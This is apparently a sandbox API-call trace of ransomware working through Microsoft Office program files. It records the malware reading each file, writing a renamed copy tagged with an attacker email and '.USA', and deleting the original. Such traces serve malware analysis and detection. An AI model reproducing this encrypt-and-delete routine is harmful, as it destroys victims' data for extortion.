[0272.001] lstrcmpiW (lpString1=".rar", lpString2=".DLL") returned 1 [0272.001] lstrlenW (lpString=".bz2") returned 4 [0272.001] lstrcmpiW (lpString1=".bz2", lpString2=".DLL") returned -1 [0272.001] lstrlenW (lpString=".7z") returned 3 [0272.001] lstrcmpiW (lpString1=".7z", lpString2="DLL") returned -1 [0272.001] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\LINES\\LINES.DLL") returned 64 [0272.001] lstrlenW (lpString=".dbf") returned 4 [0272.001] lstrcmpiW (lpString1=".dbf", lpString2=".DLL") returned -1 [0272.001] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\LINES\\LINES.DLL") returned 64 [0272.001] lstrlenW (lpString=".1cd") returned 4 [0272.001] lstrcmpiW (lpString1=".1cd", lpString2=".DLL") returned -1 [0272.001] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\LINES\\LINES.DLL") returned 64 [0272.001] lstrlenW (lpString=".jpg") returned 4 [0272.001] lstrcmpiW (lpString1=".jpg", lpString2=".DLL") returned 1 [0272.001] lstrcmpiW (lpString1=".DLL", lpString2=".USA") returned -1 [0272.001] lstrlenW (lpString="ACCDDSUI.DLL") returned 12 [0272.001] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\ACCDDSUI.DLL" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\accddsui.dll"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x390 [0272.051] GetFileSizeEx (in: hFile=0x390, lpFileSize=0x380ff1c | out: lpFileSize=0x380ff1c*=21424) returned 1 [0272.051] CloseHandle (hObject=0x390) returned 1 [0272.051] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\ACCDDSUI.DLL" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\accddsui.dll")) returned 0x20 [0272.074] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\ACCDDSUI.DLL.id-9C354B42.[mr.hacker@tutanota.com].USA" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\accddsui.dll.id-9c354b42.[mr.hacker@tutanota.com].usa")) returned 0xffffffff [0272.074] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\ACCDDSUI.DLL" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\accddsui.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0272.074] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\ACCDDSUI.DLL") returned 60 [0272.074] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\ACCDDSUI.DLL") returned 60 [0272.074] lstrlenW (lpString=".doc") returned 4 [0272.074] lstrcmpiW (lpString1=".doc", lpString2=".DLL") returned 1 [0272.074] lstrlenW (lpString=".docx") returned 5 [0272.074] lstrcmpiW (lpString1=".docx", lpString2="I.DLL") returned -1 [0272.074] lstrlenW (lpString=".pdf") returned 4 [0272.074] lstrcmpiW (lpString1=".pdf", lpString2=".DLL") returned 1 [0272.074] lstrlenW (lpString=".xls") returned 4 [0272.074] lstrcmpiW (lpString1=".xls", lpString2=".DLL") returned 1 [0272.074] lstrlenW (lpString=".xlsx") returned 5 [0272.074] lstrcmpiW (lpString1=".xlsx", lpString2="I.DLL") returned -1 [0272.074] lstrlenW (lpString=".ppt") returned 4 [0272.074] lstrcmpiW (lpString1=".ppt", lpString2=".DLL") returned 1 [0272.074] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\ACCDDSUI.DLL") returned 60 [0272.074] lstrlenW (lpString=".zip") returned 4 [0272.074] lstrcmpiW (lpString1=".zip", lpString2=".DLL") returned 1 [0272.074] lstrlenW (lpString=".rar") returned 4 [0272.075] lstrcmpiW (lpString1=".rar", lpString2=".DLL") returned 1 [0272.075] lstrlenW (lpString=".bz2") returned 4 [0272.075] lstrcmpiW (lpString1=".bz2", lpString2=".DLL") returned -1 [0272.075] lstrlenW (lpString=".7z") returned 3 [0272.075] lstrcmpiW (lpString1=".7z", lpString2="DLL") returned -1 [0272.075] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\ACCDDSUI.DLL") returned 60 [0272.075] lstrlenW (lpString=".dbf") returned 4 [0272.075] lstrcmpiW (lpString1=".dbf", lpString2=".DLL") returned -1 [0272.075] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\ACCDDSUI.DLL") returned 60 [0272.075] lstrlenW (lpString=".1cd") returned 4 [0272.075] lstrcmpiW (lpString1=".1cd", lpString2=".DLL") returned -1 [0272.075] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\ACCDDSUI.DLL") returned 60 [0272.075] lstrlenW (lpString=".jpg") returned 4 [0272.075] lstrcmpiW (lpString1=".jpg", lpString2=".DLL") returned 1 [0272.075] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\ACCDDSUI.DLL") returned 60 [0272.075] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\ACCDDSUI.DLL") returned 60 [0272.075] lstrlenW (lpString=".doc") returned 4 [0272.075] lstrcmpiW (lpString1=".doc", lpString2=".DLL") returned 1 [0272.075] lstrlenW (lpString=".docx") returned 5 [0272.075] lstrcmpiW (lpString1=".docx", lpString2="I.DLL") returned -1 [0272.075] lstrlenW (lpString=".pdf") returned 4 [0272.075] lstrcmpiW (lpString1=".pdf", lpString2=".DLL") returned 1 [0272.075] lstrlenW (lpString=".xls") returned 4 [0272.075] lstrcmpiW (lpString1=".xls", lpString2=".DLL") returned 1 [0272.075] lstrlenW (lpString=".xlsx") returned 5 [0272.075] lstrcmpiW (lpString1=".xlsx", lpString2="I.DLL") returned -1 [0272.075] lstrlenW (lpString=".ppt") returned 4 [0272.075] lstrcmpiW (lpString1=".ppt", lpString2=".DLL") returned 1 [0272.075] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\ACCDDSUI.DLL") returned 60 [0272.075] lstrlenW (lpString=".zip") returned 4 [0272.075] lstrcmpiW (lpString1=".zip", lpString2=".DLL") returned 1 [0272.076] lstrlenW (lpString=".rar") returned 4 [0272.076] lstrcmpiW (lpString1=".rar", lpString2=".DLL") returned 1 [0272.076] lstrlenW (lpString=".bz2") returned 4 [0272.076] lstrcmpiW (lpString1=".bz2", lpString2=".DLL") returned -1 [0272.076] lstrlenW (lpString=".7z") returned 3 [0272.076] lstrcmpiW (lpString1=".7z", lpString2="DLL") returned -1 [0272.076] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\ACCDDSUI.DLL") returned 60 [0272.076] lstrlenW (lpString=".dbf") returned 4 [0272.076] lstrcmpiW (lpString1=".dbf", lpString2=".DLL") returned -1 [0272.076] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\ACCDDSUI.DLL") returned 60 [0272.076] lstrlenW (lpString=".1cd") returned 4 [0272.076] lstrcmpiW (lpString1=".1cd", lpString2=".DLL") returned -1 [0272.076] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\ACCDDSUI.DLL") returned 60 [0272.076] lstrlenW (lpString=".jpg") returned 4 [0272.076] lstrcmpiW (lpString1=".jpg", lpString2=".DLL") returned 1 [0272.076] lstrcmpiW (lpString1=".DLL", lpString2=".USA") returned -1 [0272.076] lstrlenW (lpString="ACCOLKI.DLL") returned 11 [0272.076] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\ACCOLKI.DLL" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\accolki.dll"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3b4 [0272.252] GetFileSizeEx (in: hFile=0x3b4, lpFileSize=0x380ff1c | out: lpFileSize=0x380ff1c*=13240) returned 1 [0272.252] CloseHandle (hObject=0x3b4) returned 1 [0272.252] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\ACCOLKI.DLL" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\accolki.dll")) returned 0x20 [0272.272] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\ACCOLKI.DLL.id-9C354B42.[mr.hacker@tutanota.com].USA" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\accolki.dll.id-9c354b42.[mr.hacker@tutanota.com].usa")) returned 0xffffffff [0272.273] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\ACCOLKI.DLL" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\accolki.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0272.273] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\ACCOLKI.DLL") returned 59 [0272.273] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\ACCOLKI.DLL") returned 59 [0272.273] lstrlenW (lpString=".doc") returned 4 [0272.273] lstrcmpiW (lpString1=".doc", lpString2=".DLL") returned 1 [0272.273] lstrlenW (lpString=".docx") returned 5 [0272.273] lstrcmpiW (lpString1=".docx", lpString2="I.DLL") returned -1 [0272.273] lstrlenW (lpString=".pdf") returned 4 [0272.273] lstrcmpiW (lpString1=".pdf", lpString2=".DLL") returned 1 [0272.273] lstrlenW (lpString=".xls") returned 4 [0272.273] lstrcmpiW (lpString1=".xls", lpString2=".DLL") returned 1 [0272.273] lstrlenW (lpString=".xlsx") returned 5 [0272.273] lstrcmpiW (lpString1=".xlsx", lpString2="I.DLL") returned -1 [0272.273] lstrlenW (lpString=".ppt") returned 4 [0272.273] lstrcmpiW (lpString1=".ppt", lpString2=".DLL") returned 1 [0272.273] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\ACCOLKI.DLL") returned 59 [0272.273] lstrlenW (lpString=".zip") returned 4 [0272.273] lstrcmpiW (lpString1=".zip", lpString2=".DLL") returned 1 [0272.273] lstrlenW (lpString=".rar") returned 4 [0272.273] lstrcmpiW (lpString1=".rar", lpString2=".DLL") returned 1 [0272.273] lstrlenW (lpString=".bz2") returned 4 [0272.273] lstrcmpiW (lpString1=".bz2", lpString2=".DLL") returned -1 [0272.273] lstrlenW (lpString=".7z") returned 3 [0272.273] lstrcmpiW (lpString1=".7z", lpString2="DLL") returned -1 [0272.273] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\ACCOLKI.DLL") returned 59 [0272.274] lstrlenW (lpString=".dbf") returned 4 [0272.274] lstrcmpiW (lpString1=".dbf", lpString2=".DLL") returned -1 [0272.274] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\ACCOLKI.DLL") returned 59 [0272.274] lstrlenW (lpString=".1cd") returned 4 [0272.274] lstrcmpiW (lpString1=".1cd", lpString2=".DLL") returned -1 [0272.274] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\ACCOLKI.DLL") returned 59 [0272.274] lstrlenW (lpString=".jpg") returned 4 [0272.274] lstrcmpiW (lpString1=".jpg", lpString2=".DLL") returned 1 [0272.274] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\ACCOLKI.DLL") returned 59 [0272.274] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\ACCOLKI.DLL") returned 59 [0272.274] lstrlenW (lpString=".doc") returned 4 [0272.274] lstrcmpiW (lpString1=".doc", lpString2=".DLL") returned 1 [0272.274] lstrlenW (lpString=".docx") returned 5 [0272.274] lstrcmpiW (lpString1=".docx", lpString2="I.DLL") returned -1 [0272.274] lstrlenW (lpString=".pdf") returned 4 [0272.274] lstrcmpiW (lpString1=".pdf", lpString2=".DLL") returned 1 [0272.274] lstrlenW (lpString=".xls") returned 4 [0272.274] lstrcmpiW (lpString1=".xls", lpString2=".DLL") returned 1 [0272.274] lstrlenW (lpString=".xlsx") returned 5 [0272.274] lstrcmpiW (lpString1=".xlsx", lpString2="I.DLL") returned -1 [0272.274] lstrlenW (lpString=".ppt") returned 4 [0272.274] lstrcmpiW (lpString1=".ppt", lpString2=".DLL") returned 1 [0272.274] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\ACCOLKI.DLL") returned 59 [0272.274] lstrlenW (lpString=".zip") returned 4 [0272.274] lstrcmpiW (lpString1=".zip", lpString2=".DLL") returned 1 [0272.274] lstrlenW (lpString=".rar") returned 4 [0272.274] lstrcmpiW (lpString1=".rar", lpString2=".DLL") returned 1 [0272.274] lstrlenW (lpString=".bz2") returned 4 [0272.274] lstrcmpiW (lpString1=".bz2", lpString2=".DLL") returned -1 [0272.274] lstrlenW (lpString=".7z") returned 3 [0272.274] lstrcmpiW (lpString1=".7z", lpString2="DLL") returned -1 [0272.275] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\ACCOLKI.DLL") returned 59 [0272.275] lstrlenW (lpString=".dbf") returned 4 [0272.275] lstrcmpiW (lpString1=".dbf", lpString2=".DLL") returned -1 [0272.275] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\ACCOLKI.DLL") returned 59 [0272.275] lstrlenW (lpString=".1cd") returned 4 [0272.275] lstrcmpiW (lpString1=".1cd", lpString2=".DLL") returned -1 [0272.275] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\ACCOLKI.DLL") returned 59 [0272.275] lstrlenW (lpString=".jpg") returned 4 [0272.275] lstrcmpiW (lpString1=".jpg", lpString2=".DLL") returned 1 [0272.275] lstrcmpiW (lpString1=".VSL", lpString2=".USA") returned 1 [0272.275] lstrlenW (lpString="DBENGR.VSL") returned 10 [0272.275] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\DBENGR.VSL" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\dbengr.vsl"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3b4 [0272.286] GetFileSizeEx (in: hFile=0x3b4, lpFileSize=0x380ff1c | out: lpFileSize=0x380ff1c*=53144) returned 1 [0272.286] CloseHandle (hObject=0x3b4) returned 1 [0272.286] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\DBENGR.VSL" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\dbengr.vsl")) returned 0x20 [0272.286] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\DBENGR.VSL.id-9C354B42.[mr.hacker@tutanota.com].USA" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\dbengr.vsl.id-9c354b42.[mr.hacker@tutanota.com].usa")) returned 0xffffffff [0272.286] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\DBENGR.VSL" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\dbengr.vsl"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3b4 [0272.287] SetFilePointerEx (in: hFile=0x3b4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x380fec8 | out: lpNewFilePointer=0x0) returned 1 [0272.287] SetFilePointerEx (in: hFile=0x3b4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x380fec8 | out: lpNewFilePointer=0x0) returned 1 [0272.287] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\DBENGR.VSL.id-9C354B42.[mr.hacker@tutanota.com].USA" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\dbengr.vsl.id-9c354b42.[mr.hacker@tutanota.com].usa"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2bc [0272.287] GetLastError () returned 0x0 [0272.287] ReadFile (in: hFile=0x3b4, lpBuffer=0x3df0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x380fed4, lpOverlapped=0x0 | out: lpBuffer=0x3df0020*, lpNumberOfBytesRead=0x380fed4*=0xcf98, lpOverlapped=0x0) returned 1 [0272.290] WriteFile (in: hFile=0x2bc, lpBuffer=0x3df0020*, nNumberOfBytesToWrite=0xcfa0, lpNumberOfBytesWritten=0x380fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3df0020*, lpNumberOfBytesWritten=0x380fc9c*=0xcfa0, lpOverlapped=0x0) returned 1 [0272.291] ReadFile (in: hFile=0x3b4, lpBuffer=0x3df0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x380fed4, lpOverlapped=0x0 | out: lpBuffer=0x3df0020*, lpNumberOfBytesRead=0x380fed4*=0x0, lpOverlapped=0x0) returned 1 [0272.291] WriteFile (in: hFile=0x2bc, lpBuffer=0x3df0020*, nNumberOfBytesToWrite=0xe8, lpNumberOfBytesWritten=0x380fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3df0020*, lpNumberOfBytesWritten=0x380fc9c*=0xe8, lpOverlapped=0x0) returned 1 [0272.291] SetEndOfFile (hFile=0x2bc) returned 1 [0272.292] CloseHandle (hObject=0x2bc) returned 1 [0272.292] SetFilePointerEx (in: hFile=0x3b4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x380fec8 | out: lpNewFilePointer=0x0) returned 1 [0272.292] SetEndOfFile (hFile=0x3b4) returned 1 [0272.294] CloseHandle (hObject=0x3b4) returned 1 [0272.294] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\DBENGR.VSL.id-9C354B42.[mr.hacker@tutanota.com].USA", dwFileAttributes=0x20) returned 1 [0272.294] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\DBENGR.VSL" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\dbengr.vsl")) returned 1 [0272.294] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\DBENGR.VSL") returned 58 [0272.294] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\DBENGR.VSL") returned 58 [0272.294] lstrlenW (lpString=".doc") returned 4 [0272.294] lstrcmpiW (lpString1=".doc", lpString2=".VSL") returned -1 [0272.294] lstrlenW (lpString=".docx") returned 5 [0272.295] lstrcmpiW (lpString1=".docx", lpString2="R.VSL") returned -1 [0272.295] lstrlenW (lpString=".pdf") returned 4 [0272.295] lstrcmpiW (lpString1=".pdf", lpString2=".VSL") returned -1 [0272.295] lstrlenW (lpString=".xls") returned 4 [0272.295] lstrcmpiW (lpString1=".xls", lpString2=".VSL") returned 1 [0272.295] lstrlenW (lpString=".xlsx") returned 5 [0272.295] lstrcmpiW (lpString1=".xlsx", lpString2="R.VSL") returned -1 [0272.295] lstrlenW (lpString=".ppt") returned 4 [0272.295] lstrcmpiW (lpString1=".ppt", lpString2=".VSL") returned -1 [0272.295] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\DBENGR.VSL") returned 58 [0272.295] lstrlenW (lpString=".zip") returned 4 [0272.295] lstrcmpiW (lpString1=".zip", lpString2=".VSL") returned 1 [0272.295] lstrlenW (lpString=".rar") returned 4 [0272.295] lstrcmpiW (lpString1=".rar", lpString2=".VSL") returned -1 [0272.295] lstrlenW (lpString=".bz2") returned 4 [0272.295] lstrcmpiW (lpString1=".bz2", lpString2=".VSL") returned -1 [0272.295] lstrlenW (lpString=".7z") returned 3 [0272.295] lstrcmpiW (lpString1=".7z", lpString2="VSL") returned -1 [0272.295] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\DBENGR.VSL") returned 58 [0272.295] lstrlenW (lpString=".dbf") returned 4 [0272.295] lstrcmpiW (lpString1=".dbf", lpString2=".VSL") returned -1 [0272.295] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\DBENGR.VSL") returned 58 [0272.295] lstrlenW (lpString=".1cd") returned 4 [0272.295] lstrcmpiW (lpString1=".1cd", lpString2=".VSL") returned -1 [0272.295] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\DBENGR.VSL") returned 58 [0272.295] lstrlenW (lpString=".jpg") returned 4 [0272.295] lstrcmpiW (lpString1=".jpg", lpString2=".VSL") returned -1 [0272.295] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\DBENGR.VSL") returned 58 [0272.295] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\DBENGR.VSL") returned 58 [0272.295] lstrlenW (lpString=".doc") returned 4 [0272.295] lstrcmpiW (lpString1=".doc", lpString2=".VSL") returned -1 [0272.296] lstrlenW (lpString=".docx") returned 5 [0272.296] lstrcmpiW (lpString1=".docx", lpString2="R.VSL") returned -1 [0272.296] lstrlenW (lpString=".pdf") returned 4 [0272.296] lstrcmpiW (lpString1=".pdf", lpString2=".VSL") returned -1 [0272.296] lstrlenW (lpString=".xls") returned 4 [0272.296] lstrcmpiW (lpString1=".xls", lpString2=".VSL") returned 1 [0272.296] lstrlenW (lpString=".xlsx") returned 5 [0272.296] lstrcmpiW (lpString1=".xlsx", lpString2="R.VSL") returned -1 [0272.296] lstrlenW (lpString=".ppt") returned 4 [0272.296] lstrcmpiW (lpString1=".ppt", lpString2=".VSL") returned -1 [0272.296] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\DBENGR.VSL") returned 58 [0272.296] lstrlenW (lpString=".zip") returned 4 [0272.296] lstrcmpiW (lpString1=".zip", lpString2=".VSL") returned 1 [0272.296] lstrlenW (lpString=".rar") returned 4 [0272.296] lstrcmpiW (lpString1=".rar", lpString2=".VSL") returned -1 [0272.296] lstrlenW (lpString=".bz2") returned 4 [0272.296] lstrcmpiW (lpString1=".bz2", lpString2=".VSL") returned -1 [0272.296] lstrlenW (lpString=".7z") returned 3 [0272.296] lstrcmpiW (lpString1=".7z", lpString2="VSL") returned -1 [0272.296] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\DBENGR.VSL") returned 58 [0272.296] lstrlenW (lpString=".dbf") returned 4 [0272.296] lstrcmpiW (lpString1=".dbf", lpString2=".VSL") returned -1 [0272.296] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\DBENGR.VSL") returned 58 [0272.296] lstrlenW (lpString=".1cd") returned 4 [0272.296] lstrcmpiW (lpString1=".1cd", lpString2=".VSL") returned -1 [0272.296] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\DBENGR.VSL") returned 58 [0272.296] lstrlenW (lpString=".jpg") returned 4 [0272.296] lstrcmpiW (lpString1=".jpg", lpString2=".VSL") returned -1 [0272.297] lstrcmpiW (lpString1=".gta", lpString2=".USA") returned -1 [0272.297] lstrlenW (lpString="Discussion.gta") returned 14 [0272.297] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\Discussion.gta" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\discussion.gta"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3b4 [0272.297] GetFileSizeEx (in: hFile=0x3b4, lpFileSize=0x380ff1c | out: lpFileSize=0x380ff1c*=104836) returned 1 [0272.298] CloseHandle (hObject=0x3b4) returned 1 [0272.298] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\Discussion.gta" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\discussion.gta")) returned 0x20 [0272.298] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\Discussion.gta.id-9C354B42.[mr.hacker@tutanota.com].USA" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\discussion.gta.id-9c354b42.[mr.hacker@tutanota.com].usa")) returned 0xffffffff [0272.298] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\Discussion.gta" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\discussion.gta"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3b4 [0272.298] SetFilePointerEx (in: hFile=0x3b4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x380fec8 | out: lpNewFilePointer=0x0) returned 1 [0272.298] SetFilePointerEx (in: hFile=0x3b4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x380fec8 | out: lpNewFilePointer=0x0) returned 1 [0272.298] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\Discussion.gta.id-9C354B42.[mr.hacker@tutanota.com].USA" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\discussion.gta.id-9c354b42.[mr.hacker@tutanota.com].usa"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2bc [0272.298] GetLastError () returned 0x0 [0272.298] ReadFile (in: hFile=0x3b4, lpBuffer=0x3df0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x380fed4, lpOverlapped=0x0 | out: lpBuffer=0x3df0020*, lpNumberOfBytesRead=0x380fed4*=0x19984, lpOverlapped=0x0) returned 1 [0272.302] WriteFile (in: hFile=0x2bc, lpBuffer=0x3df0020*, nNumberOfBytesToWrite=0x19990, lpNumberOfBytesWritten=0x380fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3df0020*, lpNumberOfBytesWritten=0x380fc9c*=0x19990, lpOverlapped=0x0) returned 1 [0272.304] ReadFile (in: hFile=0x3b4, lpBuffer=0x3df0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x380fed4, lpOverlapped=0x0 | out: lpBuffer=0x3df0020*, lpNumberOfBytesRead=0x380fed4*=0x0, lpOverlapped=0x0) returned 1 [0272.304] WriteFile (in: hFile=0x2bc, lpBuffer=0x3df0020*, nNumberOfBytesToWrite=0xf0, lpNumberOfBytesWritten=0x380fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3df0020*, lpNumberOfBytesWritten=0x380fc9c*=0xf0, lpOverlapped=0x0) returned 1 [0272.304] SetEndOfFile (hFile=0x2bc) returned 1 [0272.304] CloseHandle (hObject=0x2bc) returned 1 [0272.304] SetFilePointerEx (in: hFile=0x3b4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x380fec8 | out: lpNewFilePointer=0x0) returned 1 [0272.304] SetEndOfFile (hFile=0x3b4) returned 1 [0272.307] CloseHandle (hObject=0x3b4) returned 1 [0272.307] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\Discussion.gta.id-9C354B42.[mr.hacker@tutanota.com].USA", dwFileAttributes=0x20) returned 1 [0272.307] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\Discussion.gta" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\discussion.gta")) returned 1 [0272.307] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\Discussion.gta") returned 62 [0272.307] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\Discussion.gta") returned 62 [0272.307] lstrlenW (lpString=".doc") returned 4 [0272.307] lstrcmpiW (lpString1=".doc", lpString2=".gta") returned -1 [0272.307] lstrlenW (lpString=".docx") returned 5 [0272.307] lstrcmpiW (lpString1=".docx", lpString2="n.gta") returned -1 [0272.307] lstrlenW (lpString=".pdf") returned 4 [0272.307] lstrcmpiW (lpString1=".pdf", lpString2=".gta") returned 1 [0272.307] lstrlenW (lpString=".xls") returned 4 [0272.307] lstrcmpiW (lpString1=".xls", lpString2=".gta") returned 1 [0272.308] lstrlenW (lpString=".xlsx") returned 5 [0272.308] lstrcmpiW (lpString1=".xlsx", lpString2="n.gta") returned -1 [0272.308] lstrlenW (lpString=".ppt") returned 4 [0272.308] lstrcmpiW (lpString1=".ppt", lpString2=".gta") returned 1 [0272.308] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\Discussion.gta") returned 62 [0272.308] lstrlenW (lpString=".zip") returned 4 [0272.308] lstrcmpiW (lpString1=".zip", lpString2=".gta") returned 1 [0272.308] lstrlenW (lpString=".rar") returned 4 [0272.308] lstrcmpiW (lpString1=".rar", lpString2=".gta") returned 1 [0272.308] lstrlenW (lpString=".bz2") returned 4 [0272.308] lstrcmpiW (lpString1=".bz2", lpString2=".gta") returned -1 [0272.308] lstrlenW (lpString=".7z") returned 3 [0272.308] lstrcmpiW (lpString1=".7z", lpString2="gta") returned -1 [0272.308] lstrlenW 